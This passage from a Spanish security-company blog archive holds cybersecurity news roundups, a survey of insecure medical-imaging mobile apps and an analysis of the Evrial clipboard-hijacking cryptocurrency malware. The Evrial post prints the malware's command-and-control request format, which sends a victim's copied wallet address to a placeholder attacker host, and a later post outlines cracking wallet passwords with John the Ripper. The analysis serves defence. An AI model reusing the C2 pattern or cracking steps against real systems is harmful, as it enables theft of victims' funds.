preguntas o problemas) y pulsar el botón de publicar. En el caso de que haya otras conversaciones con el mismo título o uno similar, el buscador las mostrará por pantalla ya que es posible que puedas encontrar ahí mismo la ayuda o respuesta que estás buscando. Si ese no es el caso, podrás cambiar el nombre y abrir una conversación nueva. En la comunidad recibirás puntos y medallas por ayudar a los demás usuarios. Esta puntuación indica en qué medida contribuyes a la comunidad y cuanto has ayudado a otros usuarios. Los puntos se pueden obtener por distintas razones; desde responder a usuarios hasta dar “like” a un comentario. Las medallas están basadas en el número de puntos que obtienes en la community y se muestran en tu perfil. Son un modo sencillo y divertido de ofrecer un reconocimiento a aquellos usuarios que contribuyen de forma activa en la comunidad. Ahora que ya sabes cómo funciona y lo que puede aportarte nuestra comunidad, no dudes en comenzar a ampliar tus conocimientos y compartir tus curiosidades acerca del mundo de la seguridad con algunos de los líderes y referentes de esta industria. ¡Aquí te esperamos! ¡ACCEDE A LA COMUNIDAD!
7 de marzo de 2018
#CyberSecurityPulse: El ataque DDoS más grande jamás visto afecta a GitHub
A finales de 2016 un ataque DDoS a DynDNS bloqueó las principales webs de Internet, como Twitter, Spotify o PayPal. De aquella se utilizó la botnet Mirai para poder aprovechar todo el ancho de banda de miles de dispositivos conectados a Internet. Sin embargo, el pasado miércoles 28 de febrero presenciamos el ataque DDoS más grande visto hasta ahora sobre la página web de GitHub alcanzando un récord de 1.35 Tbps y de 126.9 millones de paquetes por segundo. Curiosamente, los atacantes no usaron ninguna red de bots, sino servidores Memcached mal configurados para amplificar el ataque. Se trata de un sistema distribuido de propósito general para caché basado en memoria. Así, cuando la memoria se llena, se empiezan a borrar los datos que llevan más tiempo sin usarse para dejar espacio a los nuevos. Para evitar que se abuse de los servidores de Memcached, los administradores deben considerar la posibilidad bloqueos, limitar el ratio UDP en el puerto de origen 11211 o deshabilitar completamente el soporte de UDP si no están en uso. En este sentido, Akamai estima que hay al menos 50.000 servidores conectados a la red y que son vulnerables. De hecho, Arbor ha confirmado esta semana un nuevo ataque de similares características al perpetrado contra Github, alcanzando los 1.7 Terabits. Aunque no ha comunicado el nombre del cliente protegido, la compañía sí que ha indicado que se trata de una corporación con sede en Estados Unidos, que habría sufrido del mismo vector de amplificación de días anteriores apoyándose en servidores del tipo memcached. Más información en GitHub Noticias destacadas Sustraen en Islandia equipos destinados a la minería de Bitcoin valorados en 2 millones de dólares Los ladrones se llevaron multitud de material entre los que se encontraban 600 tarjetas gráficas, 100 procesadores y 100 placas base así como otros dispositivos tal y como quedó grabado por las cámaras de seguridad de la compañía Advania que ha sido afectada por dos incidentes en los últimos meses. Islandia se ha convertido en un país interesante para quienes se dedican a la minería teniendo en cuenta que la energía renovable, que supone la práctica totalidad de la energía generada en el país, es barata y accesible. Los esfuerzos policiales están intentando localizar a los ladrones poniendo especial atención a cualquier repunte del consumo energético por todo el país en una investigación que sigue abierta pese a que ya se han producido las primeras detenciones. Más información en The Hacker News Datos del gobierno alemán sustraídos tras sufrir un acceso no autorizado a sus equipos En diciembre de 2017 el gobierno alemán identificó una intrusión seria en equipos y redes vinculadas a su gobierno. El ministro portavoz, Johannes Dimroth, confirmó este extremo y añadió que se está tratando como un incidente de alta prioridad. Algunas fuentes citan que la infección podría haberse mantenido activa durante un año. El Ministerio de Interior alemán, que también ha confirmado el ataque, ha señalado a los culpables como vinculados a APT28 (también conocido como Fancy Bears), un grupo presuntamente vinculado con Rusia y que también se ha visto implicado en incidentes como el de la brecha de seguridad del Partido Demócrata previos a las últimas elecciones presidenciales estadounidenses o las elecciones francesas de 2017. Más información en Reuters Noticias del resto de la semana Coinbase enviará datos de 13.000 usuarios al IRS Coinbase ha notificado formalmente a sus clientes que cumplirá con una orden judicial y entregará los datos de los usuarios de aproximadamente 13.000 de sus clientes al Servicio de Rentas Internas. La compañía, que es uno de los exchanges de Bitcoin más grandes del mundo, envió un correo electrónico a los usuarios afectados el pasado viernes 23 de febrero. El caso comenzó en noviembre de 2016 cuando el IRS acudió a un juez federal en San Francisco para hacer cumplir que la empresa entregara los datos de todos los usuarios que realizaron transacciones a través de la plataforma entre 2013 y 2015 como parte de una investigación de evasión fiscal. Más información en Coinbase Inteligencia de Estados Unidos afirma que Rusia lanzó ataques de falsa bandera durante las Olimpiadas Los espías militares rusos han comprometido varios de cientos de equipos utilizados por las autoridades en los Juegos Olímpicos de Invierno de 2018 en Corea del Sur, según la inteligencia de Estados Unidos. Lo hicieron al tratar de hacer parecer que la intrusión fue llevada a cabo por Corea del Norte, lo que se conoce como una operación de bandera falsa, dijeron dos funcionarios estadounidenses que hablaron la semana pasada bajo la condición de anonimato para discutir un asunto delicado. Más información en Washington Post Un simple error revela los administradores de páginas de Facebook El investigador de seguridad egipcio Mohamed A. Baset ha descubierto una vulnerabilidad severa en Facebook que podría haber permitido a cualquiera exponer los perfiles de administrador de las páginas de Facebook, que de otra manera no debería ser información pública. Baset ha comentado que encontró la vulnerabilidad, descrita como un "error lógico", después de recibir una invitación para que le gustara una página de Facebook en particular en la que anteriormente le había gustado una publicación. Más información en Seekurity Otras noticias Think Tanks en Reino Unido comprometidos por grupos chinos Más información en BBC Devuelven 20.000 ethers robados durante la ICO de CoinDash Más información en ZDNet Nuevos ataques a las redes 4G LTE permiten espiar a usuarios y falsificar alertas de emergencia Más información en Security Affairs ¡Regístrate a la newsletter!
6 de marzo de 2018
(In)Seguridad en Aplicaciones Móviles PACS/DICOM
Con frecuencia nos hacemos análisis médicos. Toda la información que se produce como resultado tras estas pruebas, es almacenada en alguna infraestructura tecnológica de una empresa o en la nube, para luego ser utilizada por el médico y realizar un diagnostico, o por el usuario (paciente) para revisarla desde la palma de su mano. Acerca de esto, hemos estado revisando en otras entradas, sistemas de almacenamiento y transmisión de información médica y radiológica (PACS) y hemos evidenciado cómo ciertas vulnerabilidades pondrían en riesgo la información médica y análisis radiológicos de los usuarios. Aplicaciones móviles para comunicación con Servidores PACS Además de los servidores y servicios publicados sobre los que ya hemos hablado anteriormente, hemos observado un crecimiento de aplicaciones móviles para que los usuarios consulten desde sus tables o sus smartphones los datos médicos personales. Por ello, hemos partido de la misma pregunta: ¿Podría estar esta información en riesgo por alguna falla de seguridad informática? Muchas de estas aplicaciones tienen comunicación directa con internet mediante dispositivos y sistemas de la infraestructura interna tecnológica de servicios médicos, un vector de ataque adicional para las mismas... Descripciones mostradas en aplicaciones PACS/DICOM Mobile Viewer En este análisis hemos seleccionado la última versión de 35 aplicaciones (iOS/Android) visores DICOM o de conexión hacia servidores PACS, que evidenciamos como los más conocidos y tienen mayor cantidad de descargas en Apple Store y Google Play. Dentro de este muestreo de aplicaciones nos enfocamos en analizar únicamente las aplicaciones móvil, ya que a pesar de que se descubrieron debilidades del lado del servidor ( backend), no han sido incluidas en este post. Para esta revisión utilizamos un dispositivo Android ( rooteado), IPhone 5S (no jailbreak) y nuestra plataforma de análisis de seguridad continuo de aplicaciones móviles mASAPP. En base a los controles de seguridad del Top 10 Mobile de OWASP se realizaron pruebas a nivel macro, que solo representan un análisis general de las pruebas exhaustivas que se podrían realizar a las aplicaciones móviles, pero que estaban fuera del alcance de este análisis. Top 10 Mobile Risks OWASP Como puede verse en la siguiente imagen, los resultados demostraron que para el desarrollo de este tipo de aplicaciones la seguridad no ha sido una prioridad. Resumen General de Resultados Almacenamiento inseguro y privacidad (M2) En 18 aplicaciones Android hemos encontrado cuentas de correo electrónico de usuarios en la metadata de las apps e incluso cuentas de correo de los desarrolladores que han sido comprometidas en brechas de datos en servicios de internet. Correo de desarrollador comprometido en una brecha de datos en servicios de Internet Usuarios y contraseñas almenas en SQLite en texto plano, además de estructuras fácilmente legibles, nos denota otra mala práctica en cuanto almacenamiento local inseguro. En otros casos, nos encontramos con los passcode o pins como control de acceso en las aplicaciones, almacenados en archivos XML (XD). Bases de Datos SQLite con estructuras que almacenan contraseñas en texto plano Almacenamiento de Clave en Texto-Plan "PassCode" para acceder a la aplicación Archivo de Certificado/Key Hardcodeado en App iOS Comunicación, autenticación y cifrado (M3 – M4 – M5) Diez de las aplicaciones analizadas establecen canales HTTP no cifrados, mientras una gran parte de aplicaciones usan comunicación HTTPS con certificados autofirmados y no verifican la autenticidad del certificado digital (por ej. Métodos Certificate Pinning). Esto facilitaría a un atacante generar ataques MiTM (Main-in-the-Middle). Aplicación que alerta de Certificado Falso Uso de Certificados Auto firmados Uso de Canal HTTP para comunicación Aplicaciones que tienen “opcional” el uso de HTTPS Usando base64 para "cifrar" contraseñas Vulnerabilidades por falta de validación de datos (M7) Entre los principales hallazgos, seguimos encontrando vulnerabilidades de tipo Inyección SQL y XSS (Cross Site Scripting). En el caso particular de XSS, hemos encontrado esta vulnerabilidad en 11 aplicaciones dado que se encuentra activado en las “Webviews” para que puedan ejecutar código Javascript o a su vez agregar librerías HTML. Vulnerabilidades de XSS que permite ataques a usuarios finales de la App Otras de las malas prácticas que pudimos observar en esta categoría, es el uso o generación de funciones para ejecución de comandos desde la aplicación. Ejecución de comandos desde la aplicación Información sensible “Harcodeada” y ofuscación (M9) Las 20 aplicaciones Android se pueden descargar y modificar de manera arbitraria. Se puede obtener de manera legible las clases de JAVA de las aplicaciones porque no mantienen ninguna característica de ofuscación de código (despersonalización) para dificultar el proceso de reversing. Revisión de clases JAVA después del proceso de reversing Archivos JKS & Google API Keys “hardcoded” Esperamos que toda esta información sirva para ayudar a desarrolladores y que la industria continúe mejorando en aspectos de seguridad; ya que como vemos, al involucrar nuevas tecnologías a sectores “tradicionales”, también se pueden heredar malas prácticas que conllevan a mejorar y revisar nuevos vectores de buscan los atacantes. Los investigadores y entusiastas de la ciberseguridad día a día buscamos fallos de seguridad en esta industria y creo que aún faltan muchos por explorar; sistemas de resultados de exámenes, registros médicos en la nube, más servicios radiológicos, dispositivos embebidos ( firmware) y componentes del sector de la salud que necesitan ser evaluados profundamente, ya que juegan un papel fundamental en la vida diaria de cada uno de nosotros. Carlos Avila Chief Security Ambassador @badboy_nt carlos.avila@global.11paths.com
1 de marzo de 2018
La importancia del Big Data en la Ciberseguridad
Lo primero de todo, vamos a formularnos un par de preguntas sencillas: ¿Qué es Big Data? De manera muy resumida, el Big Data es una forma de describir grandes cantidades de datos (estructurados, no estructurados y semi-estructurados). ¿Pero esto no lo hacen ya las bases de datos y otras tecnologías tradicionales? Si, sin embargo, el concepto de Big Data se aplica a todos aquellos conjuntos de datos que, por su tamaño, complejidad, velocidad de crecimiento… no pueden ser procesados o analizados utilizando procesos o herramientas tradicionales, como, por ejemplo, bases de datos relacionales. Una vez introducido de manera muy general el concepto de Big Data, vamos a ver que cabida tiene en el mundo de la ciberseguridad. Probablemente muchos de los que os dediquéis a la seguridad informática hayáis oído que la seguridad de la información es un proceso y no un fin, esto es, que para poder garantizarla, hay que estar constantemente iterando sobre un conjunto de fases. A pesar de que la ciberseguridad puede tener muchos tipos de actividades o estrategias, es muy común ver agrupadas las fases sobre las que se debe iterar en las siguientes tres: prevención, detección y respuesta. Entendiendo esto, vamos a ver como el Big Data no sólo nos ayuda a mejorar cada una de las fases anteriores, sino que, además, nos ayuda a mejorar el proceso completo proporcionándonos la capacidad de añadir nuevas fases, como por ejemplo la predicción. Vamos a empezar por analizar cómo el Big Data ayuda al proceso de prevención de una amenaza en términos de seguridad de la información. Tener la capacidad de tratar grandes volúmenes de información no solamente nos permite saber qué es lo que está pasando en este instante, también nos permite trazar patrones a lo largo del tiempo. Muchas veces es fácil pasar por alto algunos indicadores cuando analizamos información en tiempo real, sin embargo, si analizamos esa información en otros contextos y a lo largo del tiempo, quizá podamos encontrarle otros significados. Gracias a estos patrones que extraemos del análisis de la información de otros ataques o amenazas a lo largo del tiempo, tenemos la posibilidad de tomar medidas de prevención que nos ayudan a reducir el riesgo de que esos mismos sucesos nos ocurran a nosotros. La detección de un sistema que se encuentra infectado es una parte crítica del ciclo de aseguramiento de la información del que hablábamos anteriormente. Probablemente la parte más importante del proceso de detección sea el instante temporal en el que se produce. No es lo mismo la detección de un ataque en sus primeras fases de ejecución (detección temprana) que, en las últimas fases, cuando la mayor parte del daño ha sido ocasionado. El Big Data nos posibilita la automatización de tareas de recogida de datos a gran escala y realización de su análisis en tiempos de procesamiento bajos, lo que nos permite disponer de información sobre el estado del sistema en tiempo real y proporcionar conclusiones de manera muy rápida cuando el sistema se encuentra en un estado anómalo. De esta manera, se pueda llegar a detectar una amenaza de forma temprana. Aunque aparentemente parezca que el Big Data no tiene demasiada relación con la fase de respuesta ante una amenaza, lo cierto es que también puede ayudar a mejorarla. La fase de respuesta es probablemente una de las más críticas y la que más interacción humana requiere. Para poder llevar a cabo un manejo de riesgos adecuado, es fundamental disponer de toda la información posible sobre el incidente y aplicarle la inteligencia suficiente como para extraer conclusiones que nos permitan tomar mejores decisiones. Esto es justo lo que nos proporciona el Big Data. De esta forma, no solo nos permitirá el procesamiento de toda esta información y la aplicación de inteligencia para obtener resultados concretos, sino que nos permitirá realizarlo con el mínimo retraso de tiempo posible de forma que esta información no sea irrelevante para las personas que lo reciben durante un ataque y puedan tomar decisiones rápidas. Por último, me gustaría hablar de algunas fases que no se encuentran dentro del ciclo de aseguramiento tradicional del que hemos hablado anteriormente, pero que gracias a tecnologías como el Big Data cada vez están más presentes. Este es el caso, por ejemplo, de la fase de predicción. Gracias al gran volumen de información que somos capaces de procesar a lo largo del tiempo utilizando nuevas tecnologías como el Big Data unidas a otras tecnologías de procesamiento avanzado de información como Machine Learning, podemos generar modelos de predicción suficientemente precisos como para saber de forma aproximada cuando sufriremos un determinado ciberataque o que tipo de ciberataques es probable que suframos próximamente. Esto facilita la fase de prevención y alimenta todo el ciclo de aseguramiento de la información en general. Como podemos ver, el Big Data aporta muchas ventajas dentro del mundo de la ciberseguridad. Es por ello que muchas de las grandes empresas ya incorporan este tipo de tecnologías en sus procesos de aseguramiento de la información. Por lo tanto, y teniendo todo esto en cuenta, es importante que aquel que vaya a definir uno de estos procesos tenga en cuenta esta tecnología y estudie las formas en las que le puede ser útil para su caso de uso particular. Santiago Hernández Ramos Investigador en ciberseguridad @santiagohramos Santiago.hernandezramos@telefonica.com
28 de febrero de 2018
Innovación y Laboratorio de ElevenPaths, en el foro Transfiere junto con Andalucía Open Future
ElevenPaths, de la mano de Telefónica y Andalucía Open Future, ha participado este año en Transfiere 2018, el gran foro profesional y multisectorial para la transferencia de conocimiento y tecnología que se celebró en Málaga, los días 14 y 15 de febrero. En este evento, se reunió una amplia representación del ecosistema del I+D+I nacional e internacional y hemos aportado nuestra visión para lograr un mundo digital más seguro. Transfiere es un evento tecnológico diseñado para favorecer el networking en el campo de la innovación , permitiendo que entidades de toda índole puedan poner en valor sus esfuerzos para acercar posturas y habilitar la colaboración entre ellas. En este foro se refuerza el plano divulgativo con decenas de actividades en paralelo donde se presentan distintas acciones público-privadas, se ofrecen charlas científicas de diversa índole y se generan debates de interés para toda la comunidad que participa . Telefónica, como patrocinador Oro del evento, se ha posicionado como claro dinamizador de esta colaboración multisector y desde ElevenPaths hemos aportado nuestra experiencia en el ámbito de la ciberseguridad, gracias a la versatilidad de nuestro ecosistema de soluciones de ciberseguridad dentro del panorama tecnológico ofrecido por Telefónica. Bajo este prisma de interoperabilidad, hemos contactado con múltiples empresas y start-ups con claro interés en la ciberseguridad y hemos intercambiado y comentado oportunidades tecnológicas en este sector. Adicionalmente, en un papel más divulgativo, hemos participado en una mesa debate sobre "Tendencias de Ciberseguridad en 2018". En este espacio, distintos ponentes se pronunciaron al respecto de las tendencias más incipientes en ciberseguridad para 2018. Con intención de repasar desde las tecnologías más actuales, paradigmas emergentes, y cómo no, comentar las amenazas o riesgos de seguridad más actuales para el tejido empresarial. Entre todos ellos, se destacaron los múltiples usos del Machine Learning, las ventajas de una adecuada explotación del Big Data, el crecimiento de las noticias falsas en redes sociales y también las grandes oportunidades que ofrece Blockchain en el campo de la ciberseguridad. La mesa estaba compuesta de miembros de diferentes sectores y responsabilidades del ecosistema de ciberseguridad. Éstos fueron Adolfo Cortés, coordinador de desarrollo de Producto - Big Data, en Ingenia; Israel Ortega, ingeniero preventa España en Panda Security; Iván Lastra, responsable de ciberseguridad en Vector ITC Group; Luis Joyanes, presidente de la Fundación I+D del software Libre (FIDESOL); y por último Marcos Arjona, consultor de innovación en ciberseguridad, nuestro representante de ElevenPaths.
27 de febrero de 2018
Evrial, el malware que roba Bitcoins a través del portapapeles, y el estafador estafado
Evrial es el último malware que se vende en el mercado negro, diseñado para robar criptomonedas, y que se apodera del control del portapapeles para obtener "dinero fácil". ElevenPaths ha realizado un profundo estudio técnico sobre este malware, para mostrar su funcionamiento y detalles técnicos, con un vídeo auto-explicativo. Además, hemos seguido los pasos de su creador y algunos de sus compradores. Concluimos que además de crear el malware, se ha dedicado a estafar a los estafadores. Qutra, el creador, vendiendo su malware Desde finales de 2017, teníamos Cryptoshuffle, un tipo de malware capaz de robar el portapapeles y modificar la dirección de ciertas criptomonedas en él. Pero, algo más tarde, alguien percibió el negocio en esto y comenzó a vender una plataforma a la que llamó "Evrial". A principios de 2018, Cryptoshuffle empezó a "desaparecer" y, Evrial, vio la luz (primera muestra encontrada) a mediados de enero. Se trata de un malware .NET capaz de robar contraseñas de los navegadores, clientes FTP, Pidgin y lo mejor de todo, capaz de modificar el portapapeles sobre la marcha y cambiar la dirección de una cartera de criptodivisas a otra a elección del atacante (comprador y usuario del malware). Por tanto, la característica más interesante es que el malware verifica el formato de aquello que esté en el portapapeles. Si la víctima copia, por ejemplo, la dirección de una cartera Bitcoin o Litecoin, ésta es rápidamente reemplazada por otra, sobre la marcha y dinámicamente (obteniendo la dirección destino de un servidor de control). Tomando la dirección de un servidor y estableciéndola en el portapapeles. Evrial permite al atacante controlar el portapapeles desde un cómodo panel de control donde toda la información robada está disponible. Cuando el criminal interesado en Evrial compra la aplicación, puede establecer su "nombre" para identificarse en el panel (que estará incrustado en el código y, por tanto, la versión de Evrial será única y personalizada para el comprador). Panel con el que el creador anunciaba su obra y con el que los compradores gestionan sus botines Por ejemplo, en un ordenador infectado, cada vez que una dirección de una cartera sea copiada al portapapeles, se realiza una petición a algún servidor remoto propiedad del atacante. Este es el formato: [C2domian.com]/shuffler.php?type=BTC&user=ATACANTE©=[CualquierDirecciónDeCarteraCopiadaAlPortapapeles]&hwid=[IdentificadorÚnicoDeLaVictima] Donde type puede ser BTC, LTC, ETH, XMR, WMR, WMZ o Steam. El servidor responderá con una dirección a elección del atacante. ¿Y esto para qué sirve? Cuando se quiere realizar, por ejemplo, una transferencia en Bitcoins, normalmente el usuario copia y pega la dirección destino... si ésta se cambia "sobre la marcha" el atacante espera que, de forma inconsciente y fruto de la confianza ciega en el contenido del portapapeles, el usuario confirme la transacción. Pero en este caso irá a la dirección del atacante. Ahí radica el truco. En este vídeo se muestra el funcionamiento de Evrial: Y en este lo vemos de nuevo con más detalles técnicos: Algunos datos curiosos Hemos encontrado varias versiones del malware. Todas ellas están enmascaradas en un proceso que simula ser otro diferente en la descripción. 567.exe es el proceso monitorizando el portapapeles Se ejecuta cada vez que el ordenador arranca (escondido en una llamada al registro a %appdata%). Está escrito en .NET donde algunas versiones incorporan un blindaje, que dificulta su análisis, aunque otras carecen de esta protección. El dominio C&C se obtiene de algún lugar de github cada vez que se ejecuta. De momento, este es el dominio principal para el malware Cualquier intento de copiar al portapapeles la misma dirección que devuelve el servidor (es decir, la que pertenece al atacante) hace que Evrial simplemente borre el contenido del portapapeles. ¿Quien está detras de Evrial? El propio autor muestra su nombre de usuario de Telegram: @Qutrachka. Esta cuenta aparece en el propio código fuente para contactar con él. Usando esta información y algunas muestras analizadas, ha sido posible identificar varios usuarios que utilizando el nombre Qutra y cuyo objetivo es vender este software malicioso. Hemos encontrado, además, evidencias de que el malware Cryptoshuffle está conectado con el mismo autor. Por ejemplo, en una una publicación en pastebin donde se ofrece una explicación sobre las funcionalidades de esta familia publicada bajo el mismo nombre de usuario. Días después de ponerlo a la venta, en nuestro seguimiento, hemos encontrado que algunos de los foros donde vendía su programa, el usuario Qutrachka ha sido "baneado". ¿Por qué? El usuario Qutra baneado del foro donde solía intentar vender el malware ¿Los estafadores estafados? Volviendo al malware, el campo "user" en las respuestas es bastante interesante. Hemos encontrado diferentes nombres en varias muestras que hemos analizado: Itakeda, Plaka, depr103, onfrich, fr3d, ogus, xandrum, danildh, crypto368, knoxvile, hyipblock, fast63, spysdar, zheska, medols1, raff, desusenpai… Esos corresponden también a usuarios en páginas relacionadas con Bitcoins o en foros de Steam (recordemos que el malware también roba las fórmulas de pago de esta plataforma). Nicknames encontrados en el campo "user" del malware (por tanto, compradores potenciales) encontrados a su vez en foros relacionados con Bitcoins y Steam Supuestamente, los atacantes que compraron el malware a Qutrachka, recibieron una compilación exclusiva de versión para ellos, donde el creador incrustó sus nombres. Da a entender que los "estafadores" debieron ajustar la dirección de la cartera que debía devolver el servidor a la suya, y comenzar a recoger beneficios por comprar el malware. Así es como se supone que debería ser, ¿no? Pero no es el caso, ¿recordáis esta URL? [C2domian.com]/shuffler.php?type=BTC& user=ATACANTECOMPRADOR©=[CualquierDirecciónDeCarteraCopiadaAlPortapapeles]&hwid=[IdentificadorÚnicoDeLaVictima] < El problema está en que, ahora mismo, da igual lo que insertes en el campo "user", siempre devuelve la misma dirección de criptodivisa, la que pertenece a Qutrachka y la original que aparece en las versiones más tempranas de este malware. Por tanto, nuestra teoría es: Qutrachka ha cambiado el servidor para que, ante cualquier petición realizada, devuelva la dirección de la cartera que él posee. Así que, posiblemente, haya estafado a los estafadores. ¿Cuanto ha ganado hasta ahora? Lo que hemos hecho ha sido modificar la cabecera con todos los códigos de criptodivisas posibles para, de esta forma, obtener todas las cuentas que pertenecen a los distintos tipos de dirección atacados. [C2domian.com]/shuffler.php? type=BTC&user=ATACANTE©=[CualquierDirecciónDeCarteraCopiadaAlPortapapeles]&hwid=[IdentificadorÚnicoDeLaVictima] Hemos solicitado los diferentes tipos cambiando a BTC, LTC, ETH, XMR, WMR, WMZ o Steam. Y los resultados han sido estos: LTC: LiHcBT4ag4wGi4fDt5ScXuxvjKTcp9TeG2 BTC: 12MEp1W6EBdUEcmbhg4qJfaTB5bCNPtLHh ETH: EO0x79ee1da747057c221680f94b7982ba4f3f05b822 XMR:4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nU MXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQp4nTDUPjYLQJVQKcA WMR: R262605493266 WMZ: Z924876540636 Y ahora, vamos a analizar cuánto hay en cada cartera. Tras comprobar los sistemas de pago escogidos por el atacante, ha sido posible saber que ha recibido un total de 21 transacciones en su cartera de Bitcoin, supuestamente de sus victimas, obteniendo aproximadamente 0.122 BTC. Observamos que si bien las carteras de los ataques ransomware normalmente reciben la misma cantidad de sus víctimas, en este caso, el rango es más amplio y los pagos son todos diferentes. Bitcoins obtenidos hasta finales de febrero El atacante ha movido todo el dinero a otras direcciones para intentar confundir el rastro de sus pagos. A esto hay que sumar también que el atacante ha recibido 0.0131 LTC en su cuenta de Litecoins, y que esa cantidad sigue aún disponible. Por otro lado, no ha sido posible trastear pagos relacionados con su cuenta en Monero, ni tampoco los posibles pagos recibidos en sus carteras Webmoney (WMR y WMZ). Tampoco tenemos datos sobre su cuenta de Ethereum. Innovation and laboratory innovationlab@11paths.com Miguel Ángel de Castro Simón Senior Cybersecurity Analyst at ElevenPaths miguelangel.decastro@telefonica.com » Te interesa: CriptoClipWatcher: Nuestra nueva herramienta contra las técnicas de "crypto clipboard hijacking"
26 de febrero de 2018
ElevenPaths en el MWC’18
Un año más, Telefónica acude al Mobile World Congress (MWC) con una apuesta clara: la digitalización centrada en el cliente con sus soluciones de inteligencia artificial (AURA), IoT (Internet of Things), 5G e Internet para Todos. Proyectos que en ningún caso serían una realidad sin el trabajo de la unidad de Ciberseguridad de Grupo Telefónica. La confianza digital, es un aspecto crítico para la compañía, que afecta directamente a todos y cada uno de los proyectos que verán la luz en esta importante cita tecnológica. En este marco, nuestro equipo, con Pedro Pablo Pérez, VP de Telefónica y CEO de ElevenPaths, a la cabeza, asiste para reencontrarse con clientes, proveedores y colegas del sector. El estand de Telefónica en MWC’18 dispone de un espacio dedicado a conferencias, presentación de demos y punto de encuentro con los asistentes al punto. El espacio Ágora acoge el próximo martes, 27 de febrero, la ponencia Telco4Telco de Sebastián García de Saint-Leger, responsable del desarrollo off footprint de Cyberseguridad de ElevenPaths. Si vas a acudir al MWC’18, no dejes de pasarte por el estand de Telefónica para escuchar las novedades en ciberseguridad para telcos sobre cómo proporcionar servicios digitales, con el objetivo de crear nuevas oportunidades de trabajo. A su vez, se explicará la razón por la que las telcos deberían colaborar entre ellas en temas de seguridad mostrando ejemplos de posibles colaboraciones (seguridad en el canal móvil y de gestión de vulnerabilidades). Dónde Espacio Ágora. Estand Telefónica (Hall 3 Stand 3K31, Hall 3 Stand 3K41) Cuando 27 de febrero Quién Sebastián García de Saint-Léger (Responsable del desarrollo off footprint de Cybersecurity) Qué Compartir con otras Telcos la iniciativa bautizada Telco4Telco sobre cómo proporcionar servicios digitales, y más en concreto de seguridad, creando nuevas oportunidades de negocio.
25 de febrero de 2018
Historias de #MujeresHacker: Isabel Menéndez, experta en Data Science en Telefónica Aura
Esta semana presentamos la historia de Isabel Menéndez, experta en Data Science en Telefónica Aura. Ella es una apasionada de la tecnología que dedica su trabajo a lo que más le gusta, el análisis a través de los datos. Isabel Menéndez, una de las #MujeresHacker de Telefónica CDO nos cuenta su historia Quizá porque siempre he sido una persona muy indecisa, cuando era pequeña no tenía nada claro lo que quería ser de mayor pero si sabía que me encantaba aprender cosas nuevas, descubrir cómo funciona todo lo que tenía a mi alrededor y dejar volar mi imaginación para construir aquello que se me pasara por la cabeza. Cuando llegó el momento de elegir carrera, yo estaba hecha un lío. En un principio, pensé en estudiar Arquitectura, ya que también significaba poder hacer dos cosas que me apasionaban: descubrir y crear. En un giro inesperado, elegí estudiar Telecomunicaciones, en gran parte motivada por la admiración que sentía hacía mi hermana mayor, que es informática y todo un ejemplo a seguir para mí. Una vez iniciado el camino, hubo muchos momentos buenos y malos pero, la gracia está en el equilibrio y en saber que no todo en esta vida sale a la primera. Las ganas por lo que te apasiona hacen que no desistas en el camino y que vayas a por ello con toda tu energía. Y si después de todo no funciona, ¡no pasa nada! seguro que intentándolo aprendes mucho de cosas que te ayudan a conseguir alcanzar tu próximo objetivo. Como escribió Gabriél García Márquez “He aprendido que el mundo quiere vivir en la cima de la montaña, sin saber que la verdadera felicidad está en la forma de subir la escarpada”. Desde mi punto de vista, un/a hacker es aquella persona apasionada que dedica su tiempo, su esfuerzo y sus conocimientos a conseguir resolver un problema. Pese a que lo de ser madre aún me queda un poco lejos, sin duda animaré a mis hijas a ser hackers, si es lo que les gusta, pero también a todas las niñas que puedan leer esto y que les apasione aprender y usar la tecnología. Tengo la suerte de poder dedicarme a lo que me gusta y que mi trabajo sea más una pasión que una obligación. A todas ellas, les digo que no se desanimen frente a la adversidad, que todo es posible y que lo mejor es confiar en ti misma y en tu instinto, peleando por conseguir lo que te propongas. Las personas que cambian el mundo son las que intentan conseguir imposibles y se enfrentan a sus adversidades. Isabel Menéndez Data Scientist Aura @isabelita_19 Si también eres mujer y hacker cuéntanos tu historia en mujereshacker@telefonica.com. Queremos dar cabida a todas esas historias inspiradoras, valientes y alentadoras que recibamos. Más contenido sobre #MujeresHacker: » Mamá, yo quiero ser hacker » Sheila Berta, la speaker más joven en DefCON & BlackHat » Laura Iglesias, experta en ciberseguridad y hacking en Telefónica » Paula López, Data Scientist en la 4ª Plataforma de Telefónica » Rosa María Castillo, experta en Investigación y Desarrollo en Telefónica » Ivonne Pedraza, experta en Seguridad de la Información de Telefónica » Marta Pérez, experta en User Research de Telefónica Aura » Elena Díaz, Data Scientist de Telefónica » María Domínguez, experta en productos de ciberseguridad en Telefónica » Ana Molina, Service Designer en Telefónica Aura » Mayte Miranda Cervantes, experta en ciberseguridad de Telefónica » Ángela Vázquez, Product Manager de Telefónica Aura
23 de febrero de 2018
#CyberSecurityPulse: Colega, ¿dónde están mis bitcoins?
Numerosos son los tipos de ataques que estamos presenciando los usuarios de criptodivisas: familias de malware que sustraen wallets, ataques de phishing que tratan de suplantar plataformas donde los usuarios gestionan sus carteras o donde salen públicas las ofertas iniciales de moneda (ICO, por sus siglas en inglés), aplicaciones que utilizan la CPU de los usuarios para minar... Y, además, aquellos que prefieran gestionar su propio dinero sin delegar la responsabilidad en un tercero también tendrán que hacer frente al problema de perder las claves privadas o no acordarnos de la contraseña con la que protegimos el wallet. Si te ha ocurrido y has protegido tu cartera con una contraseña de la que ya no te acuerdas, puede que no tengas todo perdido. John the Ripper, una herramienta para crackear contraseñas, contiene diferentes plugins para romper contraseñas de carteras: bitcoin2john, blockchain2john, electrum2john, ethereum2john y multibit2john. En primer lugar, tendremos que seleccionar el tipo de plugin que vamos a utilizar en función del tipo de monedero que estemos utilizando. Después, pasamos ese contenido a un fichero de texto, lanzamos John The Ripper con ./john junto con el nombre del fichero y, por último, ¡crucemos los dedos! Según un estudio realizado por The Genesis Block en 2016, el 35% de bitcoins existentes por aquel entonces no se habían utilizado en transacciones desde 2011. Según ellos, la mayoría podría corresponderse a bitcoins perdidos. Sin duda alguna, Bitcoin ha dejado muchos multimillonarios atrás que podrían haberlo sido pero que por descuidos perdieron su dinero. Noticias destacadas Empresa de agua en Europa afectada por malware que mina criptodivisas La firma de seguridad Radiflow ha detectado malware de minería de criptomonedas en la red de un proveedor de servicios de agua en Europa. Este es el primer ataque en el que un minero de criptomonedas afecta a los sistemas de control industrial (ICS) o SCADA (control de supervisión y adquisición de datos). Kfir, CTO de Radiflow, ha explicado que Radiflow todavía se encuentran en las primeras etapas de la investigación, pero hasta ahora ha podido determinar que el 